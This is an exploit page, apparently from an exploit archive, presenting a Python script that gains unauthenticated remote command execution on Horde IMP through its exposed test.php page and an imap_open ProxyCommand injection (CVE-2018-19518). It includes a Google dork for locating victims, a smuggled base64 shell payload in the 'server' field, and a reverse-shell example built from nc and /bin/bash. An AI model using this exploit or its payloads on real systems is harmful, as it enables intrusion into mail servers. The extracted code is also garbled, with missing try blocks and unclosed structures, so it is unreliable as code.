Horde Imp Unauthenticated Remote Command Execution

Horde Imp suffers from a remote command execution vulnerability.

MD5 | 338fa386602c665631b7d891401eb06f

# Exploit Title: Horde Imp Unauthenticated Remote Command Execution 
# Google Dork: inurl:/imp/login.php
# Date: 10/01/2019
# Exploit Author: Paolo Serracino - Pietro Minniti - Damiano Proietti
# Vendor Homepage: https://www.horde.org/apps/imp/
# Software Link: https://www.horde.org/download/imp
# Version: All IMP versions
# Tested on: Debian/Ubuntu

import requests
import sys
import base64
import random
import string

| Paolo Serracino - Pietro Minniti - Damiano Proietti - @OmnitechIT |
| Horde Imp Unauthenticated Command Execution via imap_open function in exposed debug page |

Horde Imp, an application that comes with the Horde GroupWare/Webmail suite exposes an unauthenticated debug page with a form
that permits IMAP requests to arbitrary hosts. The page is at http://horde_path/imp/test.php and should be deleted after installation.
Leveraging the CVE 2018-19518 and no input sanitization is possible to execute shell commands.
Tested on Debian/Ubuntu.

def check(target):

res_check = requests.get(target)
if 'PHP Mail Server Support Test' in res_check.text and 'PHP Major Version: 5.' in res_check.text:
print("[+] Target is most likely vulnerable")
return True
print("[-] Target doesn't look vulnerable")

except requests.exceptions.RequestException as e:
print("[-] Connection Issue")

def exploit(target,cmd):

cmd= base64.b64encode(cmd)
payload1 = random.choice(string.ascii_letters)
new_headers = ({'User-Agent':'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)',

res = requests.post(target,headers=new_headers,data=[('server',payload1 + ' -oProxyCommand=echo$IFS$()' + cmd + '|base64$IFS$()-d|sh}'), #in order to avoid url encoding by requests
print('[+] Sent!')

if(len(sys.argv)) < 3:

print("[+] First argument is the path of target's Horde test.php and second the payload as a shell command")
print('[+] Enclose shell commands between double quotes')
print('[+] example python horde_imap_cmd.py "mknod /tmp/bk p; nc 443 0</tmp/bk | /bin/bash 1>/tmp/bk"')

target = sys.argv[1] #+ '/imp/test.php'
cmd = sys.argv[2]

if check(target):

Related Posts